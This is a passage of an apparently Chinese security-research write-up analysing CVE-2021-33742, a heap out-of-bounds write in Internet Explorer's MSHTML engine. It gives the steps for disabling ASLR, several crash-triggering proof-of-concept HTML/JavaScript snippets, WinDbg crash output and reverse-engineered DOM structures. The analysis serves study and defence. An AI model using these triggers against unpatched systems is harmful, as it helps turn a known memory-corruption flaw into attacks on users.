CVE-2021-33742:Internet Explorer MSHTML堆越界写漏洞分析

 

漏洞背景

2021年07月14日Google威胁分析团队(TAG:Threat Analysis Group)发布了一篇标题为“How We Protect Users From 0-Day Attacks”的文章。这篇文章公布了2021年Google威胁分析团队发现的4个在野利用的0day漏洞的详细信息。Google Chrome中的CVE-2021-21166和CVE-2021-30551,Internet Explorer中的CVE-2021-33742和Apple Safari中的CVE-2021-1879。

2021年4月,TAG发现了一项针对亚美尼亚用户的攻击活动,该活动通过恶意的Office文档调用Internet Explorer加载远程的恶意Web页面来利用Internet Explorer渲染引擎中的一个漏洞进行攻击。该恶意文档通过使用Shell.Explorer.1 OLE对象嵌入远程ActiveX对象或通过VBA宏生成Internet Explorer进程并导航到恶意网页来实现攻击。此攻击中使用的漏洞被分配为CVE-2021-33742,并于2021年6月由Microsoft修复。

微软计划将于2022年6月停用Internet Explorer 11,用微软推出的新版本浏览器Microsoft Edge来替代它。为了兼容旧网站,Microsoft Edge内置了Internet Explorer模式。按理说,继续研究Internet Explorer漏洞,不再有较大意义,但是今年还是发生了多个Internet Explorer 0day漏洞在野利用的攻击事件,例如:CVE-2021-26411、CVE-2021-40444,所以研究Internet Explorer漏洞,还是存在一定的意义。

本文要分析的漏洞是存在于Trident渲染引擎/排版引擎中的一个漏洞。如今,在最新版的Windows11中,依旧可以看到Trident渲染引擎(mshtml.dll)和EdgeHTML渲染引擎(edgehtml.dll)的身影。Trident是Internet Explorer使用的排版引擎。它的第一个版本随着1997年10月发布的Internet Explorer 4发布,之后不断的加入新的技术并随着新版本的Internet Explorer发布。在Trident7.0(Internet Explorer 11使用)中,微软对Trident排版引擎做了重大的变动,除了加入新的技术之外,并增加了对网页标准的支持。EdgeHTML是由微软开发并用于Microsoft Edge的专有排版引擎。该排版引擎是Trident的一个分支,但EdgeHTML移除所有旧版Internet Explorer遗留下来的代码,并重写主要的代码以和其他现代浏览器的设计精神互通有无。

在Google威胁分析团队发布了上面所说的那篇文章之后,又在Google Project Zero的博客上公布了这些漏洞的细节。本文章就是对Internet Explorer中的CVE-2021-33742漏洞的分析过程的一个记录。我之前分析过老版本的Internet Explorer的漏洞,这是第一次比较正式的分析新版本Internet Explorer的漏洞,如有错误和不足之处,还望见谅。

 

漏洞简介

CVE-2021-33742是存在于Internet Explorer的Trident渲染引擎(mshtml.dll)中的一个堆越界写漏洞。这个漏洞是由于通过JavaScript使用DOM innerHTML属性对内部html元素设置内容(包含文本字符串)时触发的。通过innerHTML属性修改标签之间的内容时,会造成IE生成的DOM树/DOM流的结构发生改变,IE会调用CSpliceTreeEngine类的相关函数对IE的DOM树/DOM流的结构进行调整。当调用CSpliceTreeEngine::RemoveSplice()去删除一些DOM树/DOM流结构时,恰好这些结构中包含文本字符串时,就有可能会造成堆越界写。

 

分析环境

提取漏洞模块

Windows 10 x64版本内置32位和64位两个版本的Internet Explorer,分别在“C:\Program Files (x86)\Internet Explorer”和“C:\Program Files\internet explorer”两个文件夹下。但是相应架构的Internet Explorer的Trident渲染引擎(mshtml.dll)位于“C:\Windows\SysWOW64\mshtml.dll”和“C:\Windows\System32\mshtml.dll”。64位操作系统能够独立运行32位和64位版本软件,“Program Files (x86)”和“SysWOW64”存放32位软件的软件模块,“Program Files”和“System32”存放64位软件的软件模块。32位软件并不能在64位系统中直接运行,所以微软设计了WoW64(Windows-on-Windows 64-bit),通过Wow64.dll、Wow64win.dll、Wow64cpu.dll三个dll文件进行32位和64位系统的切换来运行32位软件。

本次分析,我使用的是32位Internet Explorer的Trident渲染引擎(mshtml.dll),也就是“C:\Windows\SysWOW64\mshtml.dll”。

关闭ASLR

关闭了ASLR后,可以更方便的进行调试,dll模块的加载基址不会在每次调试时发生改变,造成调试障碍。Windows10是通过Windows Defender来关闭Windows缓解措施的。打开Windows Defender后,选择“应用和浏览器控制”,然后找到“Exploit Protection”,选择“Exploit Protection 设置”。注意:设置界面拥有两个选项卡,“系统设置”和“程序设置”。我们先看“系统设置”,与ASLR有关系的是“强制映像随机化(强制性ASLR)”、“随机化内存分配(自下而上ASLR)”、“高熵ASLR”,我们都将其设为关闭状态。先关闭“高熵ASLR”,然后再关闭其他两项。

“强制映像随机化(强制性ASLR)”,不管编译时是否使用“/DYNAMICBASE”编译选项进行编译,开启了“强制性ASLR”后,会对所有软件模块的加载基址进行随机化,包括未使用“/DYNAMICBASE”编译选项编译的软件模块。关于编译时是否使用了“/DYNAMICBASE”编译选项进行编译,可以使用“Detect It Easy”查看PE文件的“IMAGE_NT_HEADERS -> IMAGE_OPTIONAL_HEADER -> DllCharacteristics -> IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE”标志位是否进行了设置。

“随机化内存分配(自下而上ASLR)”,开启了该选项后,当我们使用malloc()或HeapAlloc()在堆上申请内存时,得到的堆块地址将在一定程度上进行随机化。

“高熵ASLR”,这个选项需要配合“随机化内存分配(自下而上ASLR)”选项使用,开启了该选项后,会在“随机化内存分配(自下而上ASLR)”基础上,更大程度的随机化堆块的分配地址。

接下来,我们来看“程序设置”。由于Windows10可以对单独的应用程序设置缓解措施的开启或关闭,并且替换“系统设置”中的设置,造成关闭了“系统设置”中所有与ASLR相关的缓解措施后,dll模块的加载基址还是在变化。切换到“程序设置”选项卡后,找到iexplore.exe,点击编辑,将所有与ASLR有关的设置的“替代系统设置”的勾去掉。

设置完成后,重启一下操作系统。

这样设置完后,你可能会发现,软件模块的加载基址仍然不是一个确定的值,这时,就需要使用16进制编辑器将PE文件头中的NT Headers->Optional Header->DllCharacteristics->IMAGEDLL_CHARACTERISTICS DYNAMIC_BASE设置为0,用其替换原有的软件模块。这样就彻底关闭了Internet Explorer的ASLR了。这里推荐使用010Editor,借助它的Templates功能,可以很方便的修改该标志位。

 

漏洞复现

我使用的是Google Project Zero的Ivan Fratric提供的PoC。

<!-- 原始PoC -->
<html>
    <head>
        <script>
            var b = document.createElement("html");
            b.innerHTML = Array(40370176).toString();
            b.innerHTML = "";
        </script>
    </head>
    <body>
    </body>
</html>

由于原始PoC过于精简,无法观察到执行效果,对我理解程序的执行流程造成了一定的障碍。所以我尝试了以下几种经过修改的PoC,用于观察执行效果。

<!-- PoC1:测试执行效果 -->
<html>
    <head>
        <script>
            window.onload=function(){
                var b = document.createElement("html");
                document.body.appendChild(b);
                var arr = Array(4);
                for (var i=0;i<4;i++){
                    arr[i] = 'A';
                }
                b.innerHTML = arr.toString();
            }
        </script>
    </head>
    <body>
    </body>
</html>

执行效果如下:

我们可以得出以下结论:PoC通过HTML DOM方法document.createElement(),创建了一个“html”结点(同时创建“head”和“body”结点),并把新创建的“html”结点添加到原有的“body”结点中。然后,创建了一个Array数组并进行了初始化。最后将该数组转化为字符串,通过HTML DOM的innerHTML属性,添加到新创建的“html”结点中的“body”结点中。

原始PoC中,并未将创建的Array数组初始化,我们通过Chrome的开发者工具查看未初始化的Array数组转化为字符串后,得到的是什么。这有助于我们后面在调试PoC时,观察字符串所对应的内存数据。

可以看到,初始化后的Array数组转化成字符串后,每个元素是使用“,”分隔的。未初始化的Array数组转化成字符串后,只有一连串的“,”。其个数为Array数组元素个数减1。

<!-- PoC2:测试能否成功造成Crash -->
<html>
    <head>
        <script>
            window.onload=function(){
                var b = document.createElement("html");
                document.body.appendChild(b);
                b.innerHTML = Array(40370176).toString();
                b.innerHTML = "";
            }
        </script>
    </head>
    <body>
    </body>
</html>

经过测试,PoC2也可以成功造成Crash。关于document.createElement()的参数,只有“html”元素可以成功触发Crash,其他标签无法造成Crash(我不确定)。

好了,我们现在开始通过调试复现此漏洞。这里使用的是原始的PoC。首先打开Internet Explorer,拖入PoC,会弹出一个提示框“Internet Explorer已限制此网页运行脚本或ActiveX控件”,表示现在html中的javascript代码还没有得到执行。这时,我们打开WinDbg,附加到iexplore.exe上,输入g命令运行,然后在Internet Explorer界面点击提示框中的“允许阻止的内容”(可能需要刷新一下)。然后Internet Explorer会执行异常,WinDbg会捕获到异常并中断下来。以下是Crash的现场情况:

(211c.80c): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffd`64a43150 cc              int     3
0:015> g
ModLoad: 00000000`70a90000 00000000`70aaf000   C:\Windows\SysWOW64\WLDP.DLL
ModLoad: 00000000`771f0000 00000000`77235000   C:\Windows\SysWOW64\WINTRUST.dll
Invalid parameter passed to C runtime function.
(211c.2320): Access violation - code c0000005 (first chance)  <---- 内存访问违例
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:
63a46809 66893c50        mov     word ptr [eax+edx*2],di  ds:002b:26e1a024=????
0:004:x86> r
eax=2211a020 ebx=0504cb38 ecx=04915644 edx=02680002 esi=0504ca08 edi=0000fdef
eip=63a46809 esp=0504c7a8 ebp=0504c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:
63a46809 66893c50        mov     word ptr [eax+edx*2],di  ds:002b:26e1a024=????
0:004:x86> !address 26e1a024
Usage:                  Free
Base Address:           00000000`22e1c000
End Address:            00000000`63580000
Region Size:            00000000`40764000 (   1.007 GB)
State:                  00010000          MEM_FREE
Protect:                00000001          PAGE_NOACCESS     <---- 不可访问
Type:                   <info not present at the target>
Content source: 0 (invalid), length: 3c765fdc
0:004:x86> k
 # ChildEBP RetAddr  
00 0504c9f0 63a44fe6 MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9
01 0504cb1c 63b91ff9 MSHTML!Tree::TreeWriter::SpliceTreeInternal+0x8d
02 0504cbf8 63bca8e3 MSHTML!CDoc::CutCopyMove+0x148759
03 0504cc2c 63a80d38 MSHTML!RemoveWithBreakOnEmpty+0x1499bd
04 0504cd7c 63a80a5d MSHTML!InjectHtmlStream+0x29b
05 0504cdc0 63a81a2f MSHTML!HandleHTMLInjection+0x86
06 0504ceb8 63a816a2 MSHTML!CElement::InjectInternal+0x2c9
07 0504cf2c 63a815ba MSHTML!CElement::InjectTextOrHTML+0xdf
08 0504cf58 63a8153c MSHTML!CElement::Var_set_innerHTML+0x51
09 0504cf80 6dd74dae MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerHTML+0x3c
0a 0504cfec 6dcfed4e JSCRIPT9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
0b 0504d018 6dcfec9d JSCRIPT9!<lambda_58b9ba9eeb8f97b5e624add39c5039e7>::operator()+0xa0
0c 0504d044 6dcfec21 JSCRIPT9!ThreadContext::ExecuteImplicitCall<<lambda_58b9ba9eeb8f97b5e624add39c5039e7> >+0x73
0d 0504d090 6dc6583c JSCRIPT9!Js::JavascriptOperators::CallSetter+0x4b
0e 0504d0b0 6dc65527 JSCRIPT9!Js::InlineCache::TrySetProperty<1,1,1,1,0>+0x10c
0f 0504d104 6dd6eb85 JSCRIPT9!Js::InterpreterStackFrame::DoProfiledSetProperty<Js::OpLayoutElementCP_OneByte const >+0x97
10 0504d11c 6dccf89b JSCRIPT9!Js::InterpreterStackFrame::OP_ProfiledSetProperty<Js::OpLayoutElementCP_OneByte const >+0x19
11 0504d158 6dcc5208 JSCRIPT9!Js::InterpreterStackFrame::Process+0x1b6b
12 0504d284 007f0fe9 JSCRIPT9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x2a8
WARNING: Frame IP not in any known module. Following frames may be wrong.
13 0504d290 6dd73bb3 0x7f0fe9
14 0504d2d0 6dcfeb62 JSCRIPT9!Js::JavascriptFunction::CallFunction<1>+0x93

通过观察WinDbg的输出信息,可以发现PoC造成了异常代码为0xc0000005的内存访问违例异常。0x63a46809处的异常代码向一个内存访问权限为PAGE_NOACCESS(不可访问)的地址写入一个值,从而造成Crash。通过k命令打印栈回溯,可以知道发生异常的代码位于MSHTML!CSpliceTreeEngine::RemoveSplice()函数中。

 

Internet Explorer DOM树的结构

当如今的Web开发者想到DOM树时,他们通常会想到这样的一个树:

这样的树看起来非常的简单,然而,现实是Internet Explorer的DOM树的实现是相当复杂的。

简单地说,Internet Explorer的DOM树是为了20世纪90年代的网页设计的。当时设计原始的数据结构时,网页主要是作为一个文档查看器(顶多包含几个动态的GIF图片和其他的静态图片)。因此,算法和数据结构更类似于为Microsoft Word等文档查看器提供支持的算法和数据结构。回想一下网页发展的早期,JavaScript还没有出现,并不能通过编写脚本操作网页内容,因此我们所了解的DOM树并不存在。文本是组成网页的主要内容,DOM树的内部结构是围绕快速、高效的文本存储和操作而设计的。内容编辑(WYSIWYG:What You See Is What You Get)和以编辑光标为中心用于字符插入和有限的格式化的操作范式是当时网页开发的特点。

以文本为中心的设计

由于其以文本为中心的设计,DOM的原始结构是为了文本后备存储,这是一个复杂的文本数组系统,可以在最少或没有内存分配的情况下有效地拆分和连接文本。后备存储将文本(Text)和标签(Tag)表示为线性结构,可通过全局索引或字符位置(CP:Character Position)进行寻址。在给定的CP处插入文本非常高效,复制/粘贴一系列的文本由高效的“splice(拼接)”操作集中处理。下图直观地说明了如何将包含“hello world”的简单标记加载到文本后备存储中,以及如何为每个字符和标签分配CP。

文本后备存储为非文本实体(例如:标签和插入点)提供特殊的占位符。

为了存储非文本数据(例如:格式化和分组信息),另一组对象与后备存储分开进行维护:表示树位置的双向链表(TreePos对象)。TreePos对象在语义上等同于HTML源代码标记中的标签——每个逻辑元素都由一个开始和结束的TreePos表示。这种线性结构使得在深度优先前序遍历(几乎每个DOM搜索API和CSS/Layout算法都需要)DOM树时,可以很快的遍历整个DOM树。后来,微软扩展了TreePos对象以包括另外两种“位置”:TreeDataPos(用于指示文本的占位符)和PointerPos(用于指示诸如脱字符(“^大写字符”:用于表示不可打印的控制字符)、范围边界点之类的东西,并最终用于新特性,如:生成的内容结点)。

每个TreePos对象还包括一个CP对象,它充当标签的全局序数索引(对于遗留的document.all API之类的东西很有用)。从TreePos进入文本后备存储时需要用到CP,它可以使结点顺序的比较变得容易,甚至可以通过减去CP索引来得到文本的长度。

为了将它们联系在一起,一个TreeNode将成对的TreePos绑定在一起,并建立了JavaScript DOM所期望的“树”层次结构,如下图所示:

增加复杂性层次结构

CP的设计造成了原有的DOM非常复杂。为了使整个系统正常工作,CP必须是最新的。因此,每次DOM操作(例如:输入文本、复制/粘贴、DOM API操作,甚至点击页面——这会在DOM中设置插入点)后都会更新CP。最初,DOM操作主要由HTML解析器或用户操作驱动,所以CP始终保持最新的模型是完全合理的。但是随着JavaScript和DHTML的兴起,这些操作变得越来越普遍和频繁。

为了保持原来的更新速度,DOM添加了新的结构以提高更新的效率,并且伸展树(SplayTree)也随之产生,伸展树是在TreePos对象上添加了一系列重叠的树连接。起初,增加的复杂性提高了DOM的性能,可以用O(log n)速度实现全局CP更新。然而,伸展树实际上仅针对重复的局部搜索进行了优化(例如:针对以DOM树中某个位置为中心的更改),并没有证明对JavaScript及其更多的随机访问模式具有同样的效果。

另一个设计现象是,前面提到的处理复制/粘贴的“Splice(拼接)”操作被扩展到处理所有的树突变。核心“Splice Engine(拼接引擎)”分三步工作,如下图所示:

在步骤1中,引擎将通过从操作开始到结束遍历树的位置(TreePos)来“记录”拼接信息。然后创建一个拼接记录,其中包含此操作的命令指令(在浏览器的还原栈(Undo Stack)中重用的结构)。

在步骤2中,从树中删除与操作关联的所有结点(即TreeNode和TreePos对象)。请注意,在IE DOM树中,TreeNode/TreePos对象与脚本引用的Element对象不同,TreeNode/TreePos对象可以使标签重叠更容易,所以删除它们并不是一个功能性问题。

最后,在步骤3中,拼接记录用于在目标位置“Replay(重现)”(重新创建)新对象。例如,为了完成appendChild DOM操作,拼接引擎(Splice Engine)在结点周围创建了一个范围(从TreeNode的起始TreePos到其结束TreePos),将此范围“拼接”到旧位置之外,并创建新结点来表示新位置处的结点及其子结点。可以想象,除了算法效率低下之外,这还造成了大量内存分配混乱。

原来的DOM没有经过封装

这些只是Internet Explorer DOM复杂性的几个示例。更糟糕的是,原来的DOM没有经过封装,因此从Parser一直到Display系统的代码都对CP/TreePos具有依赖性,这需要许多年的开发时间来解决。

复杂性很容易带来错误,DOM代码库的复杂性对于软件的可靠性是一种负担。根据内部调查,从IE7到IE11,大约28%的IE可靠性错误源自核心DOM组件中的代码。而且这种复杂性也直接削弱了IE的灵活性,每个新的HTML5功能的实现成本都变得更高,因为将新理念实现到现有架构中变得更加困难。

 

漏洞原理分析

逆向mshtml.dll中此漏洞的相关类

逆向主要是通过微软提供的pdb文件,以及先前泄露的IE5.5源码完成的。

CSpliceTreeEngine

实际为SpliceTree工作的类,也就是上面所说的拼接引擎(Splice Engine)的核心类。SpliceTree可以对树的某个范围进行移除(Remove)、复制(Copy)、移动(Move)或还原移除(Undo a Remove)。当DOM树发生变化时就会调用到此类的相关函数。

以下是IE源代码中的关于此类功能的一些注释:

移除(Remove):
1、此SpliceTree的行为是移除指定范围内的所有文本(Text),以及完全落入该范围内的所有元素(Element)。
2、语义是这样的,如果一个元素不完全在一个范围内,它的结束标签(End-Tags)将不会相对于其他元素进行移动。但是,可能需要减少该元素的结点数。发生这种情况时,结点将从右边界(Right Edge)移除。
3、范围内的不具有cling的指针(CTreeDataPos)最终会出现在开始标签(Begin-Tags)和结束标签(End-Tags)之间的空间中(可以说,它们应该放在开始标签和结束标签之间)。带有cling的指针会被删除。

复制(Copy):
1、复制指定范围内的所有文本(Text),以及完全落在该范围内的元素(Element)。
2、与左侧范围重叠的元素被复制;开始边界(Begin-Edges)隐含在范围的最开始处,其顺序与开始边界在源中出现的顺序相同。
3、与右侧范围重叠的元素被复制;结束边界(End-Edges)隐含在范围的最末端,其顺序与结束边界在源中出现的顺序相同。

移动(Move):
1、指定范围内的所有文本(Text),以及完全落入该范围内的元素(Element),都被移动(移除并插入到新位置,而不是复制)。
2、使用与移除(Remove)相同的规则修改与右侧或左侧重叠的元素,然后使用与复制(Copy)相同的规则将其复制到新位置。

还原移除(Undo a Remove):
1、这种对SpliceTree的操作只能从还原代码(Undo Code)中调用。本质上,它是由先前移除(Remove)中保存的数据驱动的移动(Move)。更复杂的是,我们必须将保存的数据编织到已经存在的树中。

下面是我经过逆向得出的IE11中CSpliceTreeEngine类对象的大部分成员。

//CSpliceTreeEngine类对象结构(大小为0x110,Tree::TreeWriter::SpliceTreeInternal())

+0x000  bool _fInsert,//CSpliceTreeEngine::Init()
+0x001  bool _fRemove,//CSpliceTreeEngine::Init()
+0x002  bool _fDOMOperation,//CSpliceTreeEngine::Init()
+0x003  //CSpliceTreeEngine::Init(),一个Flag
+0x004  //CSpliceTreeEngine::Init(),一个Flag
+0x005  //CSpliceTreeEngine::Init(),一个Flag
+0x006  //CSpliceTreeEngine::Init(),一个Flag
+0x007  //CSpliceTreeEngine::Init(),一个Flag
+0x008  //CSpliceTreeEngine::Init(),一个Flag
...
+0x00C  CMarkup *_pMarkupSource,//CSpliceTreeEngine::Init()
+0x010  CTreeNode *_pnodeSourceTop,//CSpliceTreeEngine::RecordSplice()
+0x014  CTreePos *_ptpSourceL,//CSpliceTreeEngine::Init()
+0x018  CTreePos *_ptpSourceR,//CSpliceTreeEngine::Init()
+0x01C  CTreeNode *_pnodeSourceL,//CSpliceTreeEngine::RecordSplice()
+0x020  CTreeNode *_pnodeSourceR,//CSpliceTreeEngine::RecordSplice()
+0x024  CMarkup *_pMarkupTarget,//CSpliceTreeEngine::RecordBeginElement()
+0x028  CTreePos * _ptpTarget,//CSpliceTreeEngine::Init()
+0x02C  CTreeNode *_pnodeTarget,//CSpliceTreeEngine::Init()
+0x030  TCHAR* _pchRecord,//CSpliceTreeEngine::InitUndoRemove()
+0x034  LONG _cchRecord,//CSpliceTreeEngine::InitUndoRemove()
+0x038  LONG _cchRecordAlloc,//CSpliceTreeEngine::RecordText()
+0x03C  CSpliceRecord *_prec,//CSpliceTreeEngine::NextRecord()
+0x040  LONG _crec,//CSpliceTreeEngine::NextRecord()
+0x044  WhichAry _cAry,//CSpliceTreeEngine::NextRecord()
+0x048  BOOL _fReversed,//CSpliceTreeEngine::FirstRecord()
+0x04C  CSpliceRecordList* _paryRemoveUndo,//CSpliceTreeEngine::InitUndoRemove()
+0x050  BOOL _fNoFreeRecord,//CSpliceTreeEngine::InitUndoRemove()
+0x054  BOOL Flags,//CSpliceTreeEngine::RecordBeginElement(),Flag,_fNoFreeRecord=0x4
+0x058  CSpliceRecordList* ,//CSpliceTreeEngine::Init(),CSpliceTreeEngine::RecordBeginElement(),CSpliceTreeEngine::~CSpliceTreeEngine()
+0x05C  ,//CSpliceTreeEngine::RemoveSplice(),CSpliceTreeEngine::~CSpliceTreeEngine(),存放Text的内存指针
+0x060  CElement **_ppelRight,//CSpliceTreeEngine::RecordBeginElement()
...
+0x070  CSpliceRecordList _aryLeft,//CSpliceTreeEngine::RecordLeftBeginElement(),CSpliceTreeEngine::FirstRecord(),CSpliceTreeEngine::NextRecord(),非指针
+0x080  CSpliceRecordList _aryInside,//CSpliceTreeEngine::RecordBeginElement(),CSpliceTreeEngine::RecordEndElement(),CSpliceTreeEngine::RecordTextPos(),CSpliceTreeEngine::RecordPointer(),CSpliceTreeEngine::NextRecord(),非指针
+0x090  CPtrAry<CElement*> _aryElementRight,//CSpliceTreeEngine::CSpliceTreeEngine(),CSpliceTreeEngine::~CSpliceTreeEngine,CSpliceTreeEngine::NoteRightElement(),非指针
+0x09C  CPtrAry<CElement*> ,//CSpliceTreeEngine::~CSpliceTreeEngine(),CSpliceTreeEngine::RecordSkippedPointer(),非指针
+0x0A8  CRemoveSpliceUndo _RemoveUndo,//CSpliceTreeEngine::CSpliceTreeEngine(),非指针
+0x0E4  CInsertSpliceUndo _InsertUndo,//CSpliceTreeEngine::CSpliceTreeEngine(),非指针

下面是我经过逆向得出的IE11中CSpliceTreeEngine类的构造函数。

void __thiscall CSpliceTreeEngine::CSpliceTreeEngine(CSpliceTreeEngine *this, CDoc *pDoc)
{
    CSpliceRecordList *aryInside; // ecx
    CRemoveSpliceUndo *pRemoveSpliceUndo; // ecx
    CSpliceRecordList *v5; // edx
    CInsertSpliceUndo *pInsertSpliceUndo; // ecx
    int InitValue; // edx

    // public: __thiscall CSpliceTreeEngine::CSpliceTreeEngine(class CDoc *)   
    // 功能:CSpliceTreeEngine类的构造函数
    this->_aryLeft.ElementCount_Flags = 0;
    this->_aryLeft.MaxElementCount = 0;
    this->_aryLeft.pData = 0;
    aryInside = &this->_aryInside;
    aryInside->ElementCount_Flags = 0;
    aryInside->MaxElementCount = 0;
    aryInside->pData = 0;
    this->_aryLeft.field_C = 1;
    this->_aryLeft.field_D &= 0xFEu;
    aryInside->field_D &= 0xFEu;
    aryInside->field_C = 1;
    memset(&this->_aryElementRight, 0, 0x18u);
    CMarkupUndoBase::CMarkupUndoBase(&this->_RemoveUndo, pDoc, 0, 0);
    pRemoveSpliceUndo->pVtbl = &CRemoveSpliceUndo::`vftable';
    pRemoveSpliceUndo->field_28 = v5;             // 0
    pRemoveSpliceUndo->field_30 = v5;
    CMarkupUndoBase::CMarkupUndoBase(&this->_InsertUndo, pDoc, v5, v5);
    pInsertSpliceUndo->pVtbl = &CInsertSpliceUndo::`vftable';
    memset(this, InitValue, 0x70u);
}

CTreeNode

html代码中,每一对标签在IE中都会对应一个CTreeNode对象,每个CTreeNode对象的_tpBegin和_tpEnd成员分别用来标识对应标签的起始标签和结束标签。IE11中CTreeNode对象的第三个DWORD的低12位为标签的类型,通过IE5.5源代码中的enum ELEMENT_TAG枚举变量和pdb文件中全局g_atagdesc表,可以得出当前版本mshtml.dll渲染引擎中大部分标签对应的枚举值。

下面是我经过逆向得出的IE11中CTreeNode类对象的部分成员。

//CTreeNode类对象结构(大小为0x60,Tree::TreeWriter::CreateRootNode(),Tree::TreeWriter::CreateElementNode())

+0x000  CElement* _pElement,//此Node对应的元素对象的指针,CTreeNode::SetElement(),CTreeNode::CTreeNode()
+0x004  CTreeNode* _pNodeParent,//CTreeNode树中此Node的父Node,CTreeNode::CTreeNode()
+0x008  DWORD _FlagsAndEtag,//元素对象对应的标签的类型,低12位为_etag,CTreeNode::SetElement(),CTreeNode::Parent()
+0x00C  CTreePos _tpBegin, //此结点的起始CTreePos,CTreeNode::InitBeginPos()
+0x024  CTreePos _tpEnd, //此结点的结束CTreePos,CTreeNode::InitEndPos()
+0x03C  SHORT _iCF,//CTreeNode::IsCharFormatValid(),CTreeNode::GetICF(),CTreeNode::GetCharFormatHelper(),CTreeNode::IsDisplayNone()
+0x03E  SHORT _iPF,//CTreeNode::IsParaFormatValid(),CTreeNode::GetIPF()
+0x040  SHORT _iFF,//CTreeNode::IsFancyFormatValid(),CTreeNode::GetIFF()
+0x042  SHORT _iSF,//CTreeNode::IsSvgFormatValid(),CTreeNode::GetISF()
+0x044  DWORD _ulRefs_Flags,//高16位为引用计数,为0就会被释放(dword),CTreePos::AddRef(),CTreeNode::Release(),CTreeNode::CTreeNode(),CTreeNode::GetTextScaledCharFormat()
+0x048  //CTreeNode::GetLayoutAssociationItemAt()
...
+0x054  CFancyFormat* _pFancyFormat,//CTreeNode::CTreeNode()
+0x058  //CTreeNode::GetCharFormat(),CTreeNode::GetFancyFormat(),CTreeNode::GetSvgFormat(),CTreeNode::GetParaFormat(),CTreeNode::IsDisplayNone()
...

CTreePos

每个标签的开始标签和结束标签都有一个对应的CTreePos对象,其包含在CTreeNode对象中。通过CTreePos对象可以找到任何一个标签在DOM流中的位置,以及在DOM树中的位置。IE通过CTreePos对象的_pFirstChild和_pNext成员构成了实际的DOM树,通过_pLeft和_pRight成员构成了DOM流(双链表)。

下面枚举变量EType是CTreePos对象所对应的元素的类型。

enum EType { 
    Uninit=0x0,     //结点未初始化
    NodeBeg=0x1,    //对应的结点为开始标签结点
    NodeEnd=0x2,    //对应的结点为结束标签结点
    Text=0x4,       //对应的结点保存的数据是文本
    Pointer=0x8     //对应的结点保存的数据是指针,实现一个IMarkupPointer
};

下面枚举变量是某一个CTreePos对象在DOM树中与相连的CTreePos对象的关系,以及CTreePos对象的类型。

// Tree Position Flags
enum {
    TPF_ETYPE_MASK      = 0x0F,
    TPF_LEFT_CHILD      = 0x10,
    TPF_LAST_CHILD      = 0x20,
    TPF_EDGE            = 0x40,
    TPF_DATA2_POS       = 0x40,
    TPF_DATA_POS        = 0x80,
    TPF_FLAGS_MASK      = 0xFF,
    TPF_FLAGS_SHIFT     = 8
};

下面是我经过逆向得出的IE11中CTreePos类对象的完整成员。

//CTreePos类对象结构(大小为0x18,CTreeNode::InitBeginPos()、CTreeNode::InitEndPos())

+0x000  DWORD _cElemLeftAndFlags,  //我的左子树中元素的个数,低9位为Flag,CTreePos::IsNode()
+0x004  DWORD _cchLeft,            //我的左子树结构字段中的字符数(维护伸展树(Splay Tree)),CTreePos::GetCpAndMarkup()
+0x008  CTreePos*  _pFirstChild,   //我的第一个孩子结点(有可能是左,也有可能是右),CTreePos::LeftChild()
+0x00C  CTreePos*  _pNext,         //我的右兄弟或者父亲结点,CTreePos::RightChild(),CTreePos::Parent()
+0x010  CTreePos* _pLeft,          //在DOM流中,我左边的CTreePos,CTreePos::PreviousNonPtrTreePos()
+0x014  CTreePos* _pRight,         //在DOM流中,我右边的CTreePos,CTreePos::NextNonPtrTreePos()

CTreeNode::InitBeginPos()函数用于初始化起始标签对应的CTreePos对象。

CTreePos *__thiscall CTreeNode::InitBeginPos(CTreeNode *this, BOOL fEdge)
{
    CTreePos *_tpBegin; // eax

    // public: class CTreePos * __thiscall CTreeNode::InitBeginPos(int)    
    _tpBegin = &this->_tpBegin;
    // (_tpBegin.GetFlags()&~(CTreePos::TPF_ETYPE_MASK|CTreePos::TPF_DATA_POS|CTreePos::TPF_EDGE)) | BOOLFLAG(fEdge, CTreePos::TPF_EDGE) | CTreePos::NodeBeg
    this->_tpBegin._cElemLeftAndFlags = this->_tpBegin._cElemLeftAndFlags & 0xFFFFFF31 | (fEdge ? 0x41 : 1);// TPF_EDGE = 0x40,NodeBeg=0x1
    return _tpBegin;
}

CTreeNode::InitEndPos()函数用于初始化结束标签对应的CTreePos对象。

CTreePos *__thiscall CTreeNode::InitEndPos(CTreeNode *this, BOOL fEdge)
{
    CTreePos *_tpEnd; // eax

    // public: class CTreePos * __thiscall CTreeNode::InitEndPos(int)  
    _tpEnd = &this->_tpEnd;
    // (_tpEnd.GetFlags()&~(CTreePos::TPF_ETYPE_MASK|CTreePos::TPF_DATA_POS|CTreePos::TPF_EDGE)) | BOOLFLAG(fEdge, CTreePos::TPF_EDGE) | CTreePos::NodeEnd
    this->_tpEnd._cElemLeftAndFlags = this->_tpEnd._cElemLeftAndFlags & 0xFFFFFF32 | (fEdge ? 0x42 : 2);
    return _tpEnd;
}

CTreePos::GetCch()函数用于获取当前CTreePos对象对应的元素所占用的字符数量。起始标签和结束标签对应的字符数量为1,文本字符串为实际拥有的字符数,指针数据字符数的获取在CTreePos::GetContentCch()中(为0或1)。前面介绍DOM流结构时,在“以文本为中心的设计”中有提到过。

LONG __thiscall CTreePos::GetCch(CTreeDataPos *this)
{
    DWORD cElemLeftAndFlags; // eax

    // public: long __thiscall CTreePos::GetCch(void)const
    // 功能:获取当前结点的字符数,标签结点字符数为1,文本数据按实际字符数获取,指针数据字符数的获取在CTreePos::GetContentCch()中(为0或1)
    cElemLeftAndFlags = this->_cElemLeftAndFlags;
    // BOOL IsNode() const { return TestFlag(NodeBeg|NodeEnd); }
    // BOOL IsText() const { return TestFlag(Text); }
    // long CTreePos::Cch() const { return DataThis()->t._cch; }
    // long GetCch() const { return IsNode()?1:IsText()?Cch():0; }
    if ( (this->_cElemLeftAndFlags & 3) != 0 )    // NodeBeg=0x1,NodeEnd=0x2
        // 当前结点为标签结点,标签结点字符数为1
